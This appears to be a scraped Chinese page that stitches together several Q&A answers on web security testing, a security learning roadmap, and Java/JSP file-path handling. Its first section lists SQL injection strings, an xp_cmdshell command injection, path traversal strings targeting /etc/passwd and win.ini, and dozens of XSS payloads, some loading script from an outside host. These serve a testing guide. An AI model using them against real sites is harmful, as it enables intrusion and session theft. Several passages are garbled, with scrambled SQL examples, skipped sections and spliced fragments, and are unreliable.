web路径检测_web安全要学什么

1. 如何进行WEB安全性测试

安全性测试主要从以下方面考虑主要从以下方面考虑： WEB 的安全性测试主要从以下方面考虑： Injection(sql 注入) 1.SQL Injection(SQL 注入) (1)如何进行 SQL 注入测试? 首先找到带有参数传递的 URL 页面,如搜索页面,登录页面,提交评论页面等等. 注 1:对于未明显标识在 URL 中传递参数的,可以通过查看 HTML 源代码中的 "FORM"标签来辨别是否还有参数传递.在<FORM> 和</FORM>的标签中间的每一个参数传递都有可能被利用. <form id="form_search" action="/search/" method="get"> <div> <input type="text" name="q" id="search_q" value="" /> <input name="search" type="image" src="/media/images/site/search_btn.gif" /> <a href="/search/" class="fl">Gamefinder</a> </div> </form> 注 2:当你找不到有输入行为的页面时,可以尝试找一些带有某些参数的特殊的 URL,如 http://DOMAIN/INDEX.ASP?ID=10 其次,在 URL 参数或表单中加入某些特殊的 SQL 语句或 SQL 片断,如在登录页面的 URL 中输入 http://DOMAIN /INDEX.ASP?USERNAME=HI' OR 1=1-注 1：根据实际情况,SQL 注入请求可以使用以下语句: ' or 1=1- " or 1=1- or 1=1- ' or 'a'='a " or "a"="a ') or ('a'='a 注 2：为什么是 OR，以及',――是特殊的字符呢？例子：在登录时进行身份验证时，通常使用如下语句来进行验证：sql=select * from user where username='username' and pwd='password' 如输入 http://ck/index.asp?username=admin' admin' or 1='1&pwd=11，SQL 语句会变成以下：sql=select 11 1='1 username='admin' or 1='1 and password='11 admin' 1='1' 11' 11 * from user where ' 与 admin 前面的'组成了一个查询条件,即 username='admin',接下来的语句将按下一个查询条件来执行. 接下来是 OR 查询条件,OR 是一个逻辑运算符，在判断多个条件的时候，只要一个成立，则等式就成立，后面的 AND 就不再时行判断了，也就是说我们绕过了密码验证，我们只用用户名就可以登录. 如输入 http://ck/index.asp?username=admin'--&pwd=11，SQL 语 admin'-admin'-11 句会变成以下 sql=select * from user where name='admin' -- and pasword='11', admin' --' 1 '与 admin 前面的'组成了一个查询条件,即 username='admin',接下来的语句将按下一个查询条件来执行接下来是"--"查询条件,“--”是忽略或注释,上述通过连接符注释掉后面的密码验证(注:对 ACCESS 数据库数据库无效). 最后,验证是否能入侵成功或是出错的信息是否包含关于数据库服务器的相关信息;如果能说明存在 SQL 安全漏洞. 试想,如果网站存在 SQL 注入的危险,对于有经验的恶意用户还可能猜出数据库表和表结构,并对数据库表进行增\删\改的操作,这样造成的后果是非常严重的. (2)如何预防 SQL 注入? 从应用程序的角度来讲,我们要做以下三项工作工作: 工作转义敏感字符及字符串(SQL 的敏感字符包括 “exec”,”xp_”,”sp_”,”declare”,”Union”,”cmd”,”+”,”//”,”..”,”;”,”‘”,”--”,”%”,”0x”,”><=!-*/()|”, 和”空格”). 屏蔽出错信息：阻止攻击者知道攻击的结果在服务端正式处理之前提交数据的合法性(合法性检查主要包括三项:数据类型,数据长度,敏感字符的校验)进行检查等。最根本的解决手段,在确认客户端的输入合法之前,服务端拒绝进行关键性的处理操作. 从测试人员的角度来讲,在程序开发前(即需求阶段),我们就应该有意识的将安全性检查应用到需求测试中,例如对一个表单需求进行检查时,我们一般检验以下几项安全性问题: 需求中应说明表单中某一 FIELD 的类型,长度,以及取值范围(主要作用就是禁止输入敏感字符) 需求中应说明如果超出表单规定的类型,长度,以及取值范围的,应用程序应给出不包含任何代码或数据库信息的错误提示. 当然在执行测试的过程中,我们也需求对上述两项内容进行测试. 2.Crossscritping(XSS):(跨站点脚本攻击跨站点脚本攻击) 2.Cross-site scritping(XSS):(跨站点脚本攻击) (1)如何进行 XSS 测试? 首先,找到带有参数传递的 URL,如交评论,发表留言页面等等。登录页面,搜索页面,提 其次,在页面参数中输入如下语句(如:Javascrīpt,VB scrīpt, HTML,ActiveX, Flash)来进行测试： <scrīpt>alert(document.cookie)</scrīpt> 注:其它的 XSS 测试语句 ><scrīpt>alert(document.cookie)</scrīpt> ='><scrīpt>alert(document.cookie)</scrīpt> <scrīpt>alert(document.cookie)</scrīpt> <scrīpt>alert(vulnerable)</scrīpt> %3Cscrīpt%3Ealert('XSS')%3C/scrīpt%3E <scrīpt>alert('XSS')</scrīpt> <img src="javascrīpt:alert('XSS')"> %0a%0a<scrīpt>alert(\"Vulnerable\")</scrīpt>.jsp %22%3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini %3c/a%3e%3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e %3c/title%3e%3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e %3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e/index.html %3f.jsp %3f.jsp <scrīpt>alert('Vulnerable');</scrīpt> <scrīpt>alert('Vulnerable')</scrīpt> ?sql_debug=1 a%5c.aspx a.jsp/<scrīpt>alert('Vulnerable')</scrīpt> a/ a?<scrīpt>alert('Vulnerable')</scrīpt> "><scrīpt>alert('Vulnerable')</scrīpt> ';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&& %22%3E%3Cscrīpt%3Ealert(document.cookie)%3C/scrīpt%3E %3Cscrīpt%3Ealert(document. domain);%3C/scrīpt%3E& %3Cscrīpt%3Ealert(document.domain);%3C/scrīpt%3E&SESSION_ID={SESSION_ID}&SESSION_ID= 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname= ../../../../../../../../etc/passwd ..\..\..\..\..\..\..\..\windows\system.ini \..\..\..\..\..\..\..\..\windows\system.ini '';!--"<XSS>=&{()} <IMG SRC="javascrīpt:alert('XSS');"> <IMG SRC=javascrīpt:alert('XSS')> <IMG SRC=javascrīpt:alert('XSS')> <IMG SRC=javascrīpt:alert("XSS")> <IMG SRC=javascrīpt:alert('XSS')> <IMG SRC=javascrīpt:alert('XSS')> <IMG SRC="jav ascrīpt:alert('XSS');"> <IMG SRC="jav ascrīpt:alert('XSS');"> <IMG SRC="jav ascrīpt:alert('XSS');"> "<IMG SRC=java\0scrīpt:alert(\"XSS\")>";' > out <IMG SRC=" javascrīpt:alert('XSS');"> <scrīpt>a=/XSS/alert(a.source)</scrīpt> <BODY BACKGROUND="javascrīpt:alert('XSS')"> <BODY ōNLOAD=alert('XSS')> <IMG DYNSRC="javascrīpt:alert('XSS')"> <IMG LOWSRC="javascrīpt:alert('XSS')"> <BGSOUND SRC="javascrīpt:alert('XSS');"> <br size="&{alert('XSS')}"> <LAYER SRC="http://xss.ha.ckers.org/a.js"></layer> <LINK REL="stylesheet" HREF="javascrīpt:alert('XSS');"> <IMG SRC='vbscrīpt:msgbox("XSS")'> <IMG SRC="mocha:[code]"> <IMG SRC="livescrīpt:[code]"> <META HTTP-EQUIV="refresh" CONTENT="0;url=javascrīpt:alert('XSS');"> <IFRAME SRC=javascrīpt:alert('XSS')></IFRAME> <FRAMESET><FRAME SRC=javascrīpt:alert('XSS')></FRAME></FRAMESET> <TABLE BACKGROUND="javascrīpt:alert('XSS')"> <DIV STYLE="background-image: url(javascrīpt:alert('XSS'))"> <DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');"> <DIV STYLE="width: expression(alert('XSS'));"> <IMG SRC=javascript:ale&#x <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG STYLE='xss:expre\ssion(alert("XSS"))'> <STYLE TYPE="text/javascrīpt">alert('XSS');</STYLE> <STYLE type="text/css">BODY{background:url("javascrīpt:alert('XSS')")}</STYLE> <BASE HREF="javascrīpt:alert('XSS');//"> getURL("javascrīpt:alert('XSS')") a="get";b="URL";c="javascrīpt:";d="alert('XSS');";eval(a+b+c+d); <XML SRC="javascrīpt:alert('XSS');"> "> <BODY ōNLOAD="a();"><scrīpt>function a(){alert('XSS');}</scrīpt><" <scrīpt SRC="/Article/UploadFiles/200608/20060827171609376.jpg"></scrīpt> <IMG SRC="javascrīpt:alert('XSS')" <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> <scrīpt a=">" SRC="http://xss.ha.ckers.org/a.js"></scrīpt> <scrīpt =">" SRC="http://xss.ha.ckers.org/a.js"></scrīpt> <scrīpt a=">" '' SRC="http://xss.ha.ckers.org/a.js"></scrīpt> <scrīpt "a='>'" SRC="http://xss.ha.ckers.org/a.js"></scrīpt> <scrīpt>document.write("<SCRI");</scrīpt>PT SRC="http://xss.ha.ckers.org/a.js"></scrīpt> <A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A> <STYLE TYPE="text/css">.XSS{background-image:url("javascrīpt:alert('XSS')");}</STYLE><A CLASS=XSS>< 因为“\n”是新行，如果在 subject 中输入“hello\ncc:[email protected]”，可能会形成以下 Subject: hello cc: [email protected] 如果允许用户使用这样的其它用 subject，那他可能会给利用这个缺陷通过我们的平台给其它户发送垃其它圾邮件。 Traversal(目录遍历目录遍历) 5.Directory Traversal(目录遍历) （1）如何进行目录遍历测试？目录遍历产生的原因是：程序中没有过滤用户输入的“../”和“./”之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。测试方法： URL 中输入一定数量的在 “../” “./” 验证系统是否 ESCAPE 和，掉了这些目录跳转符。（2）如何预防目录遍历？限制 Web 应用在服务器上的运行进行严格的输入验证，控制用户输入非法路径 messages(错误信息错误信息) 6.exposed error messages(错误信息) （1）如何进行测试？首先找到一些错误页面，比如 404,或 500 页面。验证在调试未开通过的情况下，是否给出了友好的错误提示信息比如“你访问的页面不存在”等，而并非曝露一些程序代码。（2）如何预防？测试人员在进行需求检查时，应该对出错信息进行详细查，比如是否给出了出错信息，是否给出了正确的出错信息。

2. web安全要学什么

Web安全的范围实在太大，哪些先学，哪些后学,如果没有系统的路线会降低大家效率，对于刚入门的同学们来说简直就是“噩梦”。所以，这篇类似学习路线的文章，希望可以帮助刚入门的萌新们少走弯路。（文末附学习资料及工具领取）

首先我们来看看企业对Web安全工程师的岗位招聘需求是什么？

1职位描述

对公司各类系统进行安全加固；
对公司网站、业务系统进行安全评估测试（黑盒、白盒测试）
对公司安全事件进行响应、清理后门、根据日志分析攻击途径
安全技术研究，包括安全防范技术、黑客技术等；
跟踪最新漏洞信息，进行业务产品的安全检查。

2岗位要求

熟悉Web渗透测试方法和攻防技术，包括SQL注入、XSS跨站、CSRF伪造请求、命令执行等OWSP TOP10 安全漏洞与防御；
熟悉Linux、Windows不同平台的渗透测试，对网络安全、系统安全、应用安全有深入理解和自己的认识；
熟悉国内外安全工具，包括Kali、Linux、Metasploit、Nessus、Namp、AWVS、Burp等；
对Web安全整体有深刻理解，有一定漏洞分析和挖掘能力；

根据岗位技能需求，再来制定我们的学习路径，如下：

一、Web安全学习路径

01 HTTP基础

只有搞明白Web是什么，我们才能对Web安全进行深入研究，所以你必须了解HTTP，了解了HTTP，你就会明白安全术语的“输入输出”。黑客通过输入提交“特殊数据”，特殊数据在数据流的每个层处理，如果某个层没处理好，在输出的时候，就会出现相应层的安全问题。关于HTTP，你必须要弄明白以下知识：

HTTP/HTTPS特点、工作流程

HTTP协议（请求篇、响应篇）

了解HTML、Javascript

Get/Post区别

Cookie/Session是什么？

02 了解如下专业术语的意思

Webshell
菜刀
0day
SQL注入
上传漏洞
XSS
CSRF
一句话木马

......

03 专业黑客工具使用

熟悉如何渗透测试安全工具，掌握这些工具能大大提高你在工作的中的效率。

Vmware安装

Windows/kali虚拟机安装

Phpstudy、LAMP环境搭建漏洞靶场

Java、Python环境安装

子域名工具 Sublist3r

Sqlmap
Burpsuite
Nmap
W3af
Nessus
Appscan
AWVS

04 XSS

要研究 XSS 首先了解同源策略，Javascript 也要好好学习一下，以及HTML实体 HTML实体的10 或16进制还有Javascript 的8进制和16进制编码，最终掌握以下几种类型的XSS：

反射型 XSS：可用于钓鱼、引流、配合其他漏洞，如 CSRF 等。

存储型 XSS：攻击范围广，流量传播大，可配合其他漏洞。

DOM 型 XSS：配合，长度大小不受限制。

05 SQL注入

所谓SQL注入，就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。你需要了解以下知识：

SQL 注入漏洞原理
SQL 注入漏洞对于数据安全的影响
SQL 注入漏洞的方法
常见数据库的 SQL 查询语法
MSSQL,MYSQL,ORACLE 数据库的注入方法
SQL 注入漏洞的类型：数字型注入、字符型注入、搜索注入、盲注(sleep注入) 、Sqlmap使用、宽字节注入

SQL 注入漏洞修复和防范方法
一些 SQL 注入漏洞检测工具的使用方法

06 文件上传漏洞

了解下开源编辑器上传都有哪些漏洞，如何绕过系统检测上传一句话木马、WAF如何查杀Webshell，你必须要掌握的一些技能点：

1.客户端检测绕过（JS 检测）

2.服务器检测绕过（目录路径检测）

3.黑名单检测

4.危险解析绕过攻击

5..htaccess 文件

6.解析调用/漏洞绕过

7.白名单检测

8.解析调用/漏洞绕过

9.服务端检测绕过-文件内容检测

10.Apache 解析漏洞

11.IIS 解析漏洞

12.Nginx 解析漏洞

07 文件包含漏洞

去学习下
include() include_once() require() require_once() fopen() readfile()
这些php函数是如何产生文件包含漏洞, 本地包含与远程包含的区别，以及利用文件包含时的一些技巧如：截断 /伪url/超长字符截断等。

08 命令执行漏洞

PHP代码中常见的代码执行函数有：
eval(), assert(), preg_replace(), call_user_func(), call_user_func_array(),create_function(), array_map()等。
了解这些函数的作用然后些搞清楚如何造成的代码执行漏洞。

09 CSRF 跨站点请求

为什么会造成CSRF，GET型与POST型CSRF 的区别, 如何防御使用 Token防止CSRF？

010 逻辑漏洞

了解以下几类逻辑漏洞原理、危害及学会利用这几类漏洞：

信息轰炸、支付逻辑漏洞、任意密码修改、越权访问、条件竞争、任意注册、任意登录、顺序执行缺陷、URL跳转漏洞.

011 XEE（XML外部实体注入）

当允许XML引入外部实体时，通过构造恶意内容，可以导致文件读取、命令执行、内网探测等危害。

012 SSRF

了解SSRF的原理,以及SSRF的危害。
SSRF能做什么？当我们在进行Web渗透的时候是无法访问目标的内部网络的，那么这个时候就用到了SSRF漏洞，利用外网存在SSRF的Web站点可以获取如下信息。
1.可以对外网、服务器所在内网、本地进行端口扫描，获取一些服务的banner信息;
2.攻击运行在内网或本地的应用程序（比如溢出）;
3.对内网Web应用进行指纹识别，通过访问默认文件实现;
4.攻击内外网的Web应用，主要是使用get参数就可以实现的攻击（比如struts2，sqli等）;
5.利用file协议读取本地文件等。

如果上述漏洞原理掌握的都差不多那么你就算入门Web安全了。

如果看了上面你还不知道具体如何学习？可参考合天网安实验室Web安全工程师岗位培养路径学习：网页链接

3. Java Web结构下的路径寻址问题

WEB-INF/tree.xml 直接读取这个位置。因为WebRoot本身就是根目录了。而这个Java编译后也在根目录，所以位置就变成现在这样了。不过具体要看一下Tomcat的设置这个Java程序的Web路径。如果也在根目录就是上面这个地址，你试一下。

4. web项目访问路径错误

打开eclipse 找到你要修改的项目，右键点击，在弹出框中选择properties，如图；
4
然后去浏览器永新路京访问即可。

5. web应用程序中判断路径是否合法的问题

早就回答你的问题了，自己开始没说清楚要干什么。
下面是有js做的判断：
<script type="text/javascript">

var fso = new ActiveXObject("Scripting.FileSystemObject");
function aa(){
var filename=document.getElementById("name").value;
if( fso.FolderExists(filename)) { //判断目录是否存在
// if(fso.FileExists(filename)) {//判断文件是否存在
alert("yes");
}else{
alert("no");
}
}
</script>
<input type="text" id="name"/><input type="button" onclick="aa()"/>

6. java中如何判断web工程中图片的绝对路径是否存在

1.基本概念的理解
绝对路径：绝对路径就是你的主页上的文件或目录在硬盘上真正的路径，(URL和物理路径)例如：
C:/xyz/test.txt 代表了test.txt文件的绝对路径。http://www.sun.com/index.htm也代表了一个
URL绝对路径。
相对路径：相对与某个基准目录的路径。包含Web的相对路径（HTML中的相对目录），例如：在
Servlet中，"/"代表Web应用的跟目录。和物理路径的相对表示。例如："./" 代表当前目录,
"../"代表上级目录。这种类似的表示，也是属于相对路径。
另外关于URI，URL,URN等内容，请参考RFC相关文档标准。
RFC 2396: Uniform Resource Identifiers (URI): Generic Syntax,
(http://www.ietf.org/rfc/rfc2396.txt)

2.关于JSP/Servlet中的相对路径和绝对路径。
2.1服务器端的地址
服务器端的相对地址指的是相对于你的web应用的地址，这个地址是在服务器端解析的
（不同于html和javascript中的相对地址，他们是由客户端浏览器解析的）也就是说这时候
在jsp和servlet中的相对地址应该是相对于你的web应用，即相对于http://192.168.0.1/webapp/的。
其用到的地方有：
forward：servlet中的request.getRequestDispatcher(address);这个address是
在服务器端解析的，所以，你要forward到a.jsp应该这么写：
request.getRequestDispatcher(“/user/a.jsp”)这个/相对于当前的web应用webapp，
其绝对地址就是：http://192.168.0.1/webapp/user/a.jsp。
sendRedirect：在jsp中<%response.sendRedirect("/rtccp/user/a.jsp");%>
2.22、客户端的地址

所有的html页面中的相对地址都是相对于服务器根目录(http://192.168.0.1/)的，
而不是(跟目录下的该Web应用的目录)http://192.168.0.1/webapp/的。
Html中的form表单的action属性的地址应该是相对于服务器根目录(http://192.168.0.1/)的，
所以，如果提交到a.jsp为：action＝"/webapp/user/a.jsp"或action="<%=request.getContextPath()%>"/user/a.jsp；
提交到servlet为actiom＝"/webapp/handleservlet"
Javascript也是在客户端解析的，所以其相对路径和form表单一样。

因此，一般情况下，在JSP/HTML页面等引用的CSS,Javascript.Action等属性前面最好都加上
<%=request.getContextPath()%>,以确保所引用的文件都属于Web应用中的目录。
另外，应该尽量避免使用类似".","./","../../"等类似的相对该文件位置的相对路径，这样
当文件移动时，很容易出问题。

3. JSP/Servlet中获得当前应用的相对路径和绝对路径
3.1 JSP中获得当前应用的相对路径和绝对路径
根目录所对应的绝对路径:request.getRequestURI()
文件的绝对路径 :application.getRealPath(request.getRequestURI());
当前web应用的绝对路径 :application.getRealPath("/");
取得请求文件的上层目录:new File(application.getRealPath(request.getRequestURI())).getParent()
3.2 Servlet中获得当前应用的相对路径和绝对路径
根目录所对应的绝对路径:request.getServletPath();
文件的绝对路径 :request.getSession().getServletContext().getRealPath
(request.getRequestURI())
当前web应用的绝对路径 :servletConfig.getServletContext().getRealPath("/");
(ServletContext对象获得几种方式：
javax.servlet.http.HttpSession.getServletContext()
javax.servlet.jsp.PageContext.getServletContext()
javax.servlet.ServletConfig.getServletContext()
)
4.java 的Class中获得相对路径，绝对路径的方法
4.1单独的Java类中获得绝对路径
根据java.io.File的Doc文挡，可知:
默认情况下new File("/")代表的目录为：System.getProperty("user.dir")。
一下程序获得执行类的当前路径
package org.cheng.file;
import java.io.File;
public class FileTest {
public static void main(String[] args) throws Exception {
System.out.println(Thread.currentThread().getContextClassLoader().getResource(""));
System.out.println(FileTest.class.getClassLoader().getResource(""));
System.out.println(ClassLoader.getSystemResource(""));
System.out.println(FileTest.class.getResource(""));
System.out.println(FileTest.class.getResource("/")); //Class文件所在路径
System.out.println(new File("/").getAbsolutePath());
System.out.println(System.getProperty("user.dir"));
}
}
4.2服务器中的Java类获得当前路径（来自网络）
(1).Weblogic
WebApplication的系统文件根目录是你的weblogic安装所在根目录。
例如：如果你的weblogic安装在c:/bea/weblogic700.....
那么，你的文件根路径就是c:/.
所以，有两种方式能够让你访问你的服务器端的文件：
a.使用绝对路径：
比如将你的参数文件放在c:/yourconfig/yourconf.properties，
直接使用 new FileInputStream("yourconfig/yourconf.properties");
b.使用相对路径：
相对路径的根目录就是你的webapplication的根路径，即WEB-INF的上一级目录，将你的参数文件放
在yourwebapp/yourconfig/yourconf.properties，
这样使用：
new FileInputStream("./yourconfig/yourconf.properties");
这两种方式均可，自己选择。
(2).Tomcat
在类中输出System.getProperty("user.dir");显示的是%Tomcat_Home%/bin
(3).Resin
不是你的JSP放的相对路径,是JSP引擎执行这个JSP编译成SERVLET
的路径为根.比如用新建文件法测试File f = new File("a.htm");
这个a.htm在resin的安装目录下
(4).如何读相对路径哪？
在Java文件中getResource或getResourceAsStream均可
例：getClass().getResourceAsStream(filePath);//filePath可以是"/filename",这里的/代表web
发布根路径下WEB-INF/classes
默认使用该方法的路径是：WEB-INF/classes。已经在Tomcat中测试。
5.读取文件时的相对路径，避免硬编码和绝对路径的使用。（来自网络）
5.1 采用Spring的DI机制获得文件，避免硬编码。
参考下面的连接内容：
http://www.javajia.net/viewtopic.php?p=90213&
5.2 配置文件的读取
参考下面的连接内容：
http://dev.csdn.net/develop/article/39/39681.shtm
5.3 通过虚拟路径或相对路径读取一个xml文件，避免硬编码
参考下面的连接内容：
http://club.gamvan.com/club/clubPage.jsp?iPage=1&tID=10708&ccID=8

6.Java中文件的常用操作（复制，移动，删除，创建等）（来自网络）
常用 java File 操作类
http://www.easydone.cn/014/200604022353065155.htm

Java文件操作大全（JSP中）
http://www.pconline.com.cn/pce/empolder/gj/java/0502/559401.html
java文件操作详解（Java中文网）
http://www.51cto.com/html/2005/1108/10947.htm
JAVA 如何创建/删除/修改/复制目录及文件
http://www.gamvan.com/developer/java/2005/2/264.html
总结：
通过上面内容的使用，可以解决在Web应用服务器端，移动文件，查找文件，复制
删除文件等操作，同时对服务器的相对地址，绝对地址概念更加清晰。
建议参考URI,的RFC标准文挡。同时对Java.io.File. Java.net.URI.等内容了解透彻
对其他方面的理解可以更加深入和透彻。
==================================================================================
参考资料:
java/docs/
java.io.File
java.io.InputStream
java.io.OutputStream
java.io.FileInputStream
java.io.FileReader;
java.io.FileOutputStream
java.io.FileWriter;
java.net.URI
java.net.URL

绝对路径与相对路径祥解
http://www.webjx.com/htmldata/2005-02-26/1109430310.html
[‘J道习练’]JSP和Servlet中的绝对路径和相对路径
http://w3china.org/blog/more.asp?name=pcthomas&id=9122&commentid=12376
JSP,Servlet,Class获得当前应用的相对路径和绝对路径
http://cy.lzu.e.cn/cy/club/clubPage.jsp?ccStyle=0&tID=886&ccID=77
如何获得当前文件路径
http://www.matrix.org.cn/resource/article/44/44113_java.html
通过Spring注入机制，取得文件
http://www.javajia.net/viewtopic.php?p=90213&
配置文件的读取
http://dev.csdn.net/develop/article/39/39681.shtm
读取配置文件,通过虚拟路径或相对路径读取一个xml文件，避免硬编码！
http://club.gamvan.com/club/clubPage.jsp?iPage=1&tID=10708&ccID=8
常用 java File 操作类
http://www.easydone.cn/014/200604022353065155.htm
Java文件操作大全
http://www.pconline.com.cn/pce/empolder/gj/java/0502/559401.html
Java文件操作详解
http://www.51cto.com/html/2005/1108/10947.htm

7. web中html中的相对路径和绝对路径怎么找

路径是指文件在服务器中的存储位置。我们在使用计算机时要找到所需的文件时就必须知道文件的绝对路径，例如，只要看到这个路径d:/web/logo.gif,我们就知道logo.gif文件是在d盘的web目录下。类似于这样完整的描述文件位置的路径就是绝对路径。

绝对路径还有一种表示方法就是以服务器命名开始(如在本机中http://localhost)的完整描述文件位置的路径，如通过IIS简历一个站点，站点下面有个文件叫test.htm,那么用绝对路径来显示这个文件就是http://localhost//test.htm。

相对路径主要用在我们的网站上，当ASP在发布一个目录时，如果在Web上也像d:/web/test.htm一样，就不会显示在正常的页面。这时需要通

过站点来访问相对目录，网页上所有Web页面程序和所显示的图片都是通过相对路径来访问的。如里面的图片访问就是images/logo.gif我们可以

用"../"来表示上一级目录，"../../"表示上上级目录，依此类推。

8. 如何搭建测试web环境

步骤和方法:
1、打开控制面板，选择并进入“程序”，双击“打开或关闭Windows服务”如图所示：

3.出现Windows更改，需要等待时间的界面….

4.更新完成后，打开浏览器，输入“http://localhost/”回车，如果此时出现IIS7欢迎界面，说明Web服务器已经搭建成功。

5.当web服务器搭建成功后，我们下一步所要做的就是把我们开发的网站安装到Web服务器的目录中。一般情况下，当Web服务器安装完成后，会创建路径“%系统根目录%inetpub/wwwroot”，将我们开发的网站COPY到该路径下。即可实现本地访问该网站。

6.设置防火墙，让局域网当其它计算机也能访问本地网站资源。具体方法：打开控制面板，选择“系统和安全”，点击“允许程序通过Windows防火墙”，在弹出的对话框中勾选“万维网服务HTTP”右侧的两个复选框，最后点击确定退出。

7.在局域网中其它计算机上，打开浏览器，输入 “http://Web服务器的IP地址/”按回车键，就可以访问服务器上的资源”。经过以上步骤的设置，局域网中的其它用户就可以通过浏览器访问你所共享的web资源了！

9. 跪求网站数据库地址扫描工具(web路径探测扫描)

Xscan,LC4/5,流光……

10. 如何安全检测Java Web应用网站漏洞

1、SQL注入漏洞
从SQL注入漏洞说起吧，在web漏洞里，SQL注入是最容易被利用而又最具有危害性的。怎么快速的找到呢?先分析流程，就拿用户查看文章这个流程为例：用户访问一个action，告诉它用户想看ID为7的文章，这个action就会继续完成前面所说的流程
2、暴露程序信息漏洞
这个漏洞是怎么来的呢？我们需要从异常说起。有经验的入侵者，可以从JSP程序的异常中获取很多信息，比如程序的部分架构、程序的物理路径、SQL注入爆出来的信息等，这个漏洞很容易防御，却很难快速定位漏洞文件。出现这样漏洞的时候，通常是我们在写代码的时候，少了一些可能性的考虑而导致的。这样的问题都是经验造成的，而寻找漏洞也要通过经验加运气
3、AJAX暴露出来的漏洞
前面讲SQL注入的时候说过的例子就是一个典型的情况，因为大多数网站不是在开发时就拥有Ajax技术的，都是后来看大家都用了，赶时髦加上。但是在加上的同时没有意识到，在web上增加一个文件，就等于扩展了一点攻击面。
4、业务逻辑漏洞
这个词看起来挺抽象的，他和“暴露程序信息漏洞”有很多共同点，看名字就知道，应该是存在于业务逻辑层（service层）的漏洞。这样的漏洞都和程序的运行逻辑有关。
5、XSS漏洞
这个漏洞也影响深远，想要发现这样的漏洞，除了在页面上进行测试外，还要从流程上入手。用户输入有害信息后，信息保存到数据库，从数据库中读出来丢给用户时产生漏洞。也就是说我们有两个过程可以拦截，就是保存到数据库时，和从数据库读出来后交给用户时。最快的方法是直接打开数据库查看数据，如果数据没有经过编码直接放进了数据库，那么可能性就有了一半。剩下的一半更简单，在action层搜索转码常用的字符，如果没有，就很容易发现漏洞。即使有，也不用着急，在action层里慢慢找，很可能还有漏网之鱼。
6、页面层的逻辑漏洞
此类漏洞涵盖面很大，包括“暴露不该暴露的数据”、“权限控制的不精确”、“方便客户的同时存在安全隐患”等等。这类漏洞就只能靠着自己的经验，使用系统的每一个细小功能来寻找。

web路径检测

与web路径检测相关的内容